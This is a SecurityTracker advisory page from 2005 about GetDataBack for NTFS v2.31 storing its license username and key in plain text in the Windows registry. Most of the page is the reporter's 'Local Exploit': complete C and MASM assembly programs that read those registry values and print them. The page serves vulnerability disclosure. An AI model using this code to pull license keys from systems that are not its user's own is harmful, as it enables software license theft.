SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   GetDataBack Vendors:   Runtime Software
GetDataBack for NTFS Discloses License Key to Local Users
SecurityTracker Alert ID:  1013644
SecurityTracker URL:  http://securitytracker.com/id/1013644
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 5 2005
Impact:   Disclosure of authentication information

Version(s): 2.31; other versions may also be affected.
Description:   Kozan reported a vulnerability in GetDataBack for NTFS. A local user can obtain the license key.

The software stores the username and license key in the Windows Registry. A local user can read the values.

Impact:   A local user can obtain the license key.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.runtime.org/gdb.htm (Links to External Site)
Cause:   Access control error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 5 Apr 2005 01:36:23 +0300
Subject:  GetDataBack for NTFS v2.31 discloses license info (username and


---------------------
Application:
---------------------


GetDataBack for NTFS v2.31

(and probably other and prior versions)


---------------------
Introduction:
---------------------

Vendor: Runtime Software
www.runtime.org

Vendor Description: Recover your files when the data is no longer
accessible due to formatting, fdisk, virus attack, power or
software failure. Get everything back even when the drive's partition
table, boot record, Master File Table or root directory is lost or corrupt.



---------------------
Bug:
---------------------


GetDataBack for NTFS v2.31 stores license informations (username and key)
in registry with plain text format without crypting and
can be viewed by a local user.



---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------

-------
C CODE:
-------


/*****************************************************************

GetDataBack for NTFS v2.31 Local Exploit by Kozan

Application: GetDataBack for NTFS v2.31
Vendor: www.runtime.org - Runtime Software
Vulnerable Description: GetDataBack for NTFS v2.31 discloses licence
informaations ( username and key ) to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com


*****************************************************************/


#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char username[BUFSIZE], key[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int main(void)
{

	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Runtime
Software\\GetDataBackNT\\License",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey) == ERROR_SUCCESS)
	{

            lRet = RegQueryValueEx( hKey, "Name", NULL, NULL,(LPBYTE) username,
&dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!");
                                 return 0;
                        }


			lRet = RegQueryValueEx( hKey, "Key", NULL, NULL,(LPBYTE) key, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!");
                                 return 0;
                        }
            			RegCloseKey( hKey );

                        printf("GetDataBack for NTFS v2.31 Local Exploit by
Kozan\n");
			printf("Credits to ATmaCA\n");
			printf("www.netmagister.com  -  www.spyinstructors.com\n");
			printf("kozan@netmagister.com\n\n");
                        printf("Username: %s\n",username);
                        printf("Key     : %s\n",key);


         }
         else{
                 printf("GetDataBack for NTFS v2.31 is not installed on your
system!\n");
         }


        return 0;
}




---------
ASM CODE:
---------



;*****************************************************************

;GetDataBack for NTFS v2.31 Local Exploit by Kozan

;Application: GetDataBack for NTFS v2.31
;Vendor: www.runtime.org - Runtime Software
;Vulnerable Description: GetDataBack for NTFS v2.31 discloses licence
;informaations ( username and key ) to local users.

;Discovered & Coded by: Kozan
;Credits to ATmaCA
;Web : www.netmagister.com
;Web2: www.spyinstructors.com
;Mail: kozan@netmagister.com

;*****************************************************************

.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
include \masm32\include\masm32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\masm32.lib
     literal MACRO quoted_text:VARARG
       LOCAL local_text
       .data
         local_text db quoted_text,0
       .code
       EXITM <local_text>
     ENDM
     SADD MACRO quoted_text:VARARG
       EXITM <ADDR literal(quoted_text)>
     ENDM
.data
   SubKey            db "SOFTWARE\\Runtime Software\\GetDataBackNT\\License",0
   szUser            db "Name",0
   szKey             db "Key",0
   notInstalled      db "GetDataBack for NTFS v2.31 is not installed on your
pc!",0
   Theoutput  db  
'_______________________________________________________________',13,10
              db   '*       GetDataBack for NTFS v2.31 Local Exploit by Kozan   
 *',13,10
              db   '*                  Discovered & Coded by Kozan              
 *',13,10
              db   '*                      Credits to ATmaCA                    
 *',13,10
              db   '*         www.spyinstructors.com - www.netmagister.com      
 *',13,10
	      db   '*                    kozan@netmagister.com                   
*',13,10
              db  
'*_____________________________________________________________*',13,10
              db   '                      Username: %s                          
  ',13,10
              db   '                      Key     : %s                          
  ',13,10,0
   KeySize    DWORD 255
.data?
    TheUSERData         db 64 dup (?)
    TheKEYData          db 64 dup (?)
    TheReturn           DWORD ?
    strbuf              db 258 dup (?)
.code
start:
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr SubKey,0,KEY_READ,addr
TheReturn
     .IF eax==ERROR_SUCCESS
        invoke RegQueryValueEx,TheReturn,addr szUser,0,0,addr TheUSERData, addr
KeySize
                        .IF KeySize < 2
                             invoke lstrcpy,addr TheUSERData,SADD("NOT FOUND")
                        .ENDIF
        invoke RegQueryValueEx,TheReturn,addr szKey,0,0,addr TheKEYData, addr
KeySize
                         .IF KeySize < 2
                             invoke lstrcpy,addr TheKEYData,SADD("NOT FOUND")
                        .ENDIF
        invoke wsprintf, addr strbuf, addr Theoutput,addr TheUSERData,addr
TheKEYData
        invoke StdOut, addr strbuf
     .ELSE
        invoke StdOut, addr notInstalled
     .ENDIF
    invoke RegCloseKey , TheReturn
   Invoke ExitProcess,0
end start




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC